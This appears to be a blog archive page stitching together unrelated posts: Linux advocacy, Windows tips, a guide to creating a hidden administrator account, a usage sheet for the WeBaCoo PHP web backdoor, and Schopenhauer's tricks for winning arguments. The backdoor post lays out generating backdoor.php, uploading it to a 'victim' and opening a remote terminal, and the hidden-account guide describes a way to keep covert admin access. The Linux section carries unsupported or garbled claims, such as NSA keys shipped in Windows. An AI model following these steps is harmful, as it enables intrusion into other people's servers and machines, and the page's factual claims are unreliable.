Wednesday, May 25, 2016

What is RAID ?

RAID Explanation

RAID Explanation

 RAID is a way to get protected from hard­disk failures.
 An example of RAID ?
Let'simagine the three directors of Coca­Cola company.
 If one of them knows the entire production secrets, he might build his own company. If each of them knows only the third of the secret, as soon as one dies, the product is lost.

So, let's divide the product secret in three: part A, B and C. Director 1 knows secret A, director 2 knows secret B and director 3 knows secret C. 

For redundancy reasons, let's learn to director 1 the secret B too, to director 2 the secret C and to director 3 the secret A.
In this case, none of them knows the entire production method, but any of them might die, the remaining knows what to learn to the newly hired director. 

The only thing we know about hard­disks is: they will die.
But no one's know when.
 If you want your data to survive your hard disk, use RAID (as Linux provides you for free). You will have the opportunity to replace your crashed hard­disk and see the system rebuild the missing data without even stopping you to work !

Choose multi­console system

Linux is multi­console. 

Linux is multi­console.

Linux comes usually with 6 text­based consoles, plus 1 graphical one.
 On that graphical console, you have by default 4 virtual screens.
 First users gets confused by so many "screens".
Once used to it, systems providing only one desktop will look frustrating to you.

 Why should you be limited to only one desktop ?
 Why not launch the word processing tool in plain screen on one console, the web browser in an another one, and leave my preferred game paused on the third one ?

Soon, you will increase the number of such consoles to 8, 12 or 16... And surprise ! You will not even need to reboot to enjoy it !

Develop on Linux !

Linux is a standard-respectful  platform.

Develop on Linux !

 When you develop on Linux, your software will likely use standardized APIs from standardized
programming languages (Perl, Bash, Tcl/Tk, Java, Posix, Ansi­C, C++...)
so that your software will be easily ported on other operating systems:
 • BSD
• Mac OS­X
• Solaris
 • AIX
• True­64
• Irix
• Hurd
• ... With a bit of care, it is even possible to develop directly pure portable code. So Choose Linux to develop platform­ independent code

Linux competitor's controlled system ?



Linux is not under the control of a software development company.
 As software development company, you can choose Windowsas preferred operating system, delivering Windows solutions to your customers.
If you do that, you know that soon or later, you will loose your business in favor of Microsoft.
 Why ? 
Because as soon as Microsoft will identify your business as significant, they will use the same technique they used againstCorel, Netscape, Borland, ...
They will change the API such a way that your software will become unstable, inefficient and buggy.
They will develop hidden API that only their software will be able to use, giving them unfair market advantage...
And they will win: they are playing on their backyard...
And it'syou that choose to fight with them there !

 A good counter­example is the success of Sony in the game market: their PlayStation II is NOT RUNNING Microsoft system. That's why they are still on tracks.

Linux is more secure than Windows !?

Top reasons that shows Linux is more secure than Windows !?

Linux is more secure than Windows !?

Linux is not under the control of NSA.
The NSA (National Security Agency, USA) and Microsoft recognized that two sets of secret keyswhere shipped with Windows in order to alloweither Microsoft and NSA to enter any Windows running computer in the world.

Do we accept a foreign security agency to control our bank accounts, our official mails, e­mails, our justice records ?

Do we accept our armies to run such software ?

Linux is open­source. Anybody can check if there is such a back­door in it. NSA is working on a certificated secure version of the Linux kernel for USA use, because they know Windows is not secure. If USA chooses Linux for security, why not Europe ?

Why Linux is the right one ?

Top reasons that show Linux is the right one 

 Linux is the right one

Linux, as operating system, is and will always remain free (in the sense of a free beer).
There is no license to pay to anybody.

More than that, Linuxcost of ownership is very low because of:
 • You don't need expensive anti­virus software.
• You don't need to maintain a license database.
• You don't need to reinstall crashed/corrupted systems 
• You don't need to install expensive remote management software
 • You harmed by very old well known bugs that have not yet been fixed
 • You can choose your operating system supplier (no monopoly)
 • You can choose between various equivalent softwares (alternative solutions exists on Linux)
 • You can adapt the system to your exact needs: you remain master of your software solution.

Linux is European

Linux is European technology !
Linux is European

The creator of Linux, Linus Torvald, is European!
Linux is now used throughout the world (Asia, Oceania, North and South America).
Why not in Europe ?
Do we need to depend on technological matters on foreign countries, while we have the best technology in town ?
Are we plan to add to our regrettable energetic dependency the high­tech one ?
What might become Europe without techno­logical capability ?
 Our only resource is our brains. If we become technologically dependent of a foreign country, we are going to become a third­world country within the next decades.

Problems in Linux

Why Linux is best for scientists and companies ? 

linux tux

 Linux manages properly the memory
Thanks the state of the art implementation of the research results in computer science coming from Unix, universities and other research centers, Linux properly manages the memory (demand paging).

The consequence ?

• If a buggy software crashes, you don't need to reboot the computer
• If a software ends, it does not leave unused memory (memory leaking) leading to "Low on resources" error message.
 • If a malicious code gets executed, it does not spread among the entire system memory.
 •Two users sharing the same computer at the same time can't corrupt the other user software memory.

Linux is awesome !

Top reasons that show Linux is awesome !

Linux is awesome !

Linux is stable. 
It manages properly the memory, tasks, user rights, access to the I/O and hardware, so that some Linux hosts are running actively since more than 5 continuous years !
When does a Linux system stops ?
 – When there is a hardware failure
– When there is a power outage
 – When there is a system upgrade 
– When it is shut­down by its owner Linux development team started even the development of a system allowing upgrades without interruption of the services !

Compare this kind of stability with Win NT4: Microsoft recognized that an internal bug caused the system to crash after only 47 days ! Nobody notice, because Microsoft systems are always crashing anyway !

Choose the freedom choose Linux

Choose the freedom ! Choose Linux !

Linux is multi­vendor.

freedom Linux

 This means that by choosing Linux, you choose to depend on a set of (more than 50) Linux distributorsin the world, plus the open­source community.

 This is definitely safer than depending on a unique vendor.

 It is also saner: prices ­if any­ are driven by the market, not by monopoly. 

This means also that the distributors are fighting to give you the best service, the best documentation, the easiest installation procedures, the quickest updates, the best security updates, the smartest trainings, the most appropriate assistance, the most efficient help­desk... in order to keep you as customer !

Reasons to choose Linux

Top Reasons to choose Linux

Top Reasons to choose Linux

Linux is open­source.
 This means you have access to the code of the operating system.
You can actually learn computer science, change the code and experience the result.
You can even participate to the development code.
 Linux is good for students.
 Other non open­source operating systems do not allow learning how a system works.
 They don't allow you neither to try new developments or experiment a ­potentially genial­ idea.
With non open­source systems, your role is reduced to license buyer. 

Linux Best Choice ?

Why to choose Linux

Linux Best

Linux is multi­user. 
On a Linux box, several users can log­on simultaneously.
 This means that you have the freedom to share the same computer among various tasks launched by various users.
This means you can share the same program installation among various users.
This allows you to
– Save license costs
– Save installation time
– Save back­up time
 – Save upgrade time
This is only possible if the operating system is very stable and separates efficiently the data and codebelonging to various users.

Why Linux ?

Why use Linux

Why Linux ?

 Linux is multi­platform. 

This means that by choosing Linux, you choose aportable operating system on which you can run or develop portable applications. Linux runs on Sparc (Sun), Alpha (Compaq), Mips, ARM, x86 (Intel), PowerPC, 680x0 (Motorola), RS6000 (IBM), and so on... So, when choosing Linux for your operating system, you open choices to you. You don'treduce your choices to no­other­choice­than Intel running IBMcompatible PC !

Interesing Facts about Linux

Quick Facts About Linux

In 1998, IBM compared its fastest computer,
Dip Blue, to a 64­nodes cluster running Linux..
 The result is: The Linux cluster was about 4 times faster... for the quarter of the price. They are not the only company to have made an actual Linux test, but the difference is that they published the result, and acted accordingly:

IBM invested 750 000 000 $ in 1999
 1 000 000 000 $ in 2000
 1 000 000 000 $ in 2001in the port of Linux on all its platforms, from the simplest to the mainframe.
They are now installing Linux as operating system in their largest customers back offices. Even WallStreet is using Linux those days !

Creating Hidden Net User Administrator on Windows 10

windows 10 user

  • Open Notepad. To Open Notepad, press Windows + R and type Notepad inside the box

  • Copy and paste the code below in Notepad:

  • In the above code, Replace mypassword with your own password and hiddenuser with your administrator name.
  • Now save the file as Hidden.bat. Here, .bat stand for the batch file extension.
  • Once you save, you will see a bat file icon created in the folder where you saved the .bat file.
  • Right click on the icon and select ‘Run as Administrator’. Once you ‘Run as Administrator’, a command prompt will appear showing that your account is being created.

  • Once it’s done, you might want to recheck it. So, to recheck and confirm your created account, open a Command Prompt window. PressWindows+R and type cmd in the box and a Command Prompt window will appear. 

  • Type the command net user in the command prompt. There should space in between net and user in the command and press enter. Now you can see your hidden Net User Administrator account On Windows 10.

Hiding The Hidden Net User Administrator:

  • Now, the next step is to hide this account. Open a new Command Prompt window with administrative permissions by right clicking on the cmd icon.

  • Now type the following command and press enter: net user hidden /active:no

  • Like this, you’ll be able to hide an account on your Windows 10 PC.

Accessing The Hidden Net User Administrator:

  • To access this account, you need to open a new Command Prompt window with administrative permissions.
  • Now, enter the following command and press enter: net user hidden /active:yes

  • This will bring your account to the front with the name you specified. To check this, you need to log off your computer or click on top-right corner of the Start Menu.

  • After using this hidden account, follow the step to hide this hidden user account and restrict people from accessing it.
Now with this account, you can ensure privacy by managing all your private information under this hidden account. Moreover, this account will have complete administrator access to your computer.

Monday, May 23, 2016

How to use NSLOOKUP

  • Nslookup to know your default DNS server and IP address

Just type nslookup in you command prompt and you will get your default DNS server and its IP address:

  • Nslookup for any web servers IP address

Let’s say I want to know the IP address of Microsoft’s web servers. So just nslookup in you command prompt and you will get the DNS server name and its IP address:
nslookup webservers

In the above screen, you can see that there is a term called Non-authoritative answer. This answer is shown when the reply comes from a source which is not considered authoritative for the domain which it’s returning a record for.
For example, in the above query, the response is coming from my default DNS server which would come as non-authoritative because it is not listed in the list of nameservers for

How to Make Windows 10 Full Backup

How to Make Windows 10 Full Backup:

  • Open the Control Panel of your Windows 10 system. You can also do so by typing control panel in the search area in Windows 10.
    windows 10
  • Insert an external USB Drive where you want to backup your system. You can also make a backup on other system drives.
  • Under the control panel, click on File history.
    backup windows 10
  • Click on the System Image Backup under the file history at the left bottom.
  • Clicking on System Image Backup will open a new window. There, look at the left side pane and click on ‘Create a System Image’
    windows 10 backup
  • Once clicked on this option, a new Windows prompt will ask you to Choose your location. There are three options for that:
    • On a hard drive (including your external USB drive)
    • On a DVD and,
    • On a network location
  • Note that creating a Windows 10 full backup on DVD or network location can take a lot of time. So, I prefer to do it on external hard drive or on a hard drive other than the C drive.
    windows 10 backup
    • Click on next and it will ask you to choose from all of the drives you want to make a backup for.
    • Choose your option here and then click on Next.
    • Once clicked on next, the following screen will come which will show your backup location as well the drives that are being backed up.

Saturday, May 14, 2016

WeBaCoo [Web Backdoor Cookie Script-Kit]



Usage: [options]
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote “terminal” connection (-u is required)
-u URL Backdoor URL
-c C_NAME Cookie name (default: “M-cookie”)
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data-h Display help and exitupdate Check for updates and apply if any
1. Generate php backdoor file
– ./ -g -o backdoor.php
2. Upload backdoor to victim
3.Use WeBaCoo connect to backdoor
– ./ -t -u http://victim/backdoor.php
4.Now you are in the victim console, do whatever you want 

Sunday, May 8, 2016

Eight ways to win a argume t

Eight Ways to Win an Argument
from Schopenhauer's "The Art of Controversy"

1-Carry your opponent's proposition beyond its natural limits; exaggerate it.
The more general your opponent's statement becomes, the more objections you can find
against it. The more restricted and narrow your own propositions remain, the easier they are to defend.
2-Use different meanings of your opponent's words to refute his argument.
Example: Person A says, "You do not understand the mysteries of Kant's philosophy."
Person B replies, "Of, if it's mysteries you're talking about, I'll have nothing to do with
3-Ignore your opponent's proposition, which was intended to refer to some particular
thing. Rather, understand it in some quite different sense, and then refute it.
Attack something different than what was asserted.
4-Hide your conclusion from your opponent until the end.
Mingle your premises here and there in your talk.
Get your opponent to agree to them in no definite order.
By this circuitous route you conceal your goal until you have reached all the admissions
necessary to reach your goal.
5-Use your opponent's beliefs against him.
If your opponent refuses to accept your premises, use his own premises to your advantage.
Example, if the opponent is a member of an organization or a religious sect to which you
do not belong, you may employ the declared opinions of this group against the opponent.
6-Confuse the issue by changing your opponent's words or what he or she seeks to prove.
Example: Call something by a different name: "good repute" instead of "honor," "virtue"
instead of "virginity," "red-blooded" instead of "vertebrates".
7-State your proposition and show the truth of it by asking the opponent many questions.
By asking many wide-reaching questions at once, you may hide what you want to get
admitted. Then you quickly propound the argument resulting from the proponent's
8 -Make your opponent angry.
An angry person is less capable of using judgment or perceiving where his or her
advantage lies.